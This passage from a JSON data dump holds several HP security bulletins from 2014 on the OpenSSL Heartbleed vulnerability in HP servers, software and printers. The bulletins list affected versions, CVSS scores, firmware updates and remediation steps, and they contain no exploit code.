in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNRuDoACgkQ4B86/C0qfVmexQCcD1Lmts47FOGN0Menqko8xYif\r\nRn0An37XtrV5oSdnUBMK4ppE0n35P/XD\r\n=GtcJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.2 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30510", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30510", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268240\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268240\r\nVersion: 1\r\n\r\nHPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl server migration running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101543\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server migration. This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgW8ACgkQ4B86/C0qfVkSPACg6AXj97HaBw46iPIin1VL7YnW\r\nnoQAoJbFj4yAe286o14VdL81VuF3D3xb\r\n=G4bD\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30519", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30519", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272043\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272043\r\nVersion: 1\r\n\r\nHPSBPI03031 rev.1 - HP Officejet Pro X Printers, Certain Officejet Pro\r\nPrinters, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Officejet Pro X\r\nprinters and in certain Officejet Pro printers running OpenSSL. This is the\r\nOpenSSL vulnerability known as "Heartbleed" (CVE-2014-0160) which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101548\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nPlease refer to the RESOLUTION\r\n below for a list of impacted products.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\nHP has provided firmware updates that address this vulnerability. Please see\r\nthe table below. To obtain the updated firmware, follow the below steps to\r\nobtain the firmware Update.\r\n\r\nObtain the firmware update from www.hp.com/go/support\r\n\r\nSelect "Drivers & Downloads".\r\nEnter the product name listed in the table below into the search field.\r\nClick on "Go".\r\nClick on the appropriate product.\r\nUnder "Select operating system" select any Windows operating system from the\r\nlist.\r\nSelect the appropriate firmware update under "Firmware".\r\n\r\nProduct Name\r\n Model Number\r\n Firmware Revision\r\n\r\nHP Officejet Pro X451dn Printer\r\n CN459A\r\n BNP1CN1409BR\r\n\r\nHP Officejet Pro X451dw Printer\r\n CN463A\r\n BWP1CN1409BR\r\n\r\nHP Officejet Pro X551dw Printer\r\n CV037A\r\n BZP1CN1409BR\r\n\r\nHP Officejet Pro X476dn Multifunction Printer\r\n CN460A\r\n LNP1CN1409BR\r\n\r\nHP Officejet Pro X476dw Multifunction Printer\r\n CN461A\r\n LWP1CN1409BR\r\n\r\nHP Officejet Pro X576dw Multifunction Printer\r\n CN598A\r\n LZP1CN1409BR\r\n\r\nHP Officejet Pro 276dw Multifunction Printer\r\n CR770A\r\n FRP1CN1416BR\r\n\r\nHP Officejet Pro 251dw Printer\r\n CV136A\r\n EVP1CN1416BR\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhXb4ACgkQ4B86/C0qfVndrACggnOpxKlt7khtZKKXc5Q/q6uJ\r\nACYAnRQh1aMRra+LPUo9vSwpILIrbS/u\r\n=krj5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBPI03031 rev.1 - HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30512", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267775\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267775\r\nVersion: 1\r\n\r\nHPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Diagnostics\r\nrunning OpenSSL. OpenSSL is a 3rd party product that is embedded with some of\r\nHP Software products. This bulletin objective is to notify HP Software\r\ncustomers about products affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101539)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Diagnostics 9.23 and 9.23 IP1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nCustomers should download the security remediation guidelines from the\r\nfollowing link:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00868126\r\n\r\nHP recommends completing the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 - Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNavpgACgkQ4B86/C0qfVkj7QCg0J8cRJO9r8wa9JVIHcIZm0Qx\r\nca0AoO/PCAVZUJX7izSERN0LqreLU3ok\r\n=CUx8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30498", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30498", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04271396\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04271396\r\nVersion: 1\r\n\r\nHPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Service Pack\r\nfor ProLiant (SPP) bundled software running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101546\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Service Pack for ProLiant (SPP) impacted software products and versions\r\n\r\nHP Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Integrated Lights-Out 2 (iLO 2) version v2.23 and earlier\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Service Pack for\r\nProLiant (SPP) bundled software in the following updates and/or HP Security\r\nBulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP Service Pack for ProLiant (SPP)\r\n Version:2014.02.0 (B)\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheT\r\nok=com.vignette.cachetoken&javax.portlet.prp_bd9b6997fbc7fc515f4cf4626f5c8d01\r\n=wsrp-navigationalState%3Didx%253D%257CswItem%253DMTX_335408c4a064478d934e942\r\n3c0%257CswEnvOID%253D4024%257CitemLocale%253D%257CswLang%253D%257Cmode%253D5%\r\n257Caction%253DdriverDocument&javax.portlet.tpst=bd9b6997fbc7fc515f4cf4626f5c\r\n8d01&sp4ts.oid=5104019&ac.admitted=1395175158147.876444892.199480143\r\n\r\nHP Onboard Administrator (OA)\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nHP Integrated Lights-Out 2 (iLO 2)\r\n HPSBMU03006\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04244787\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via 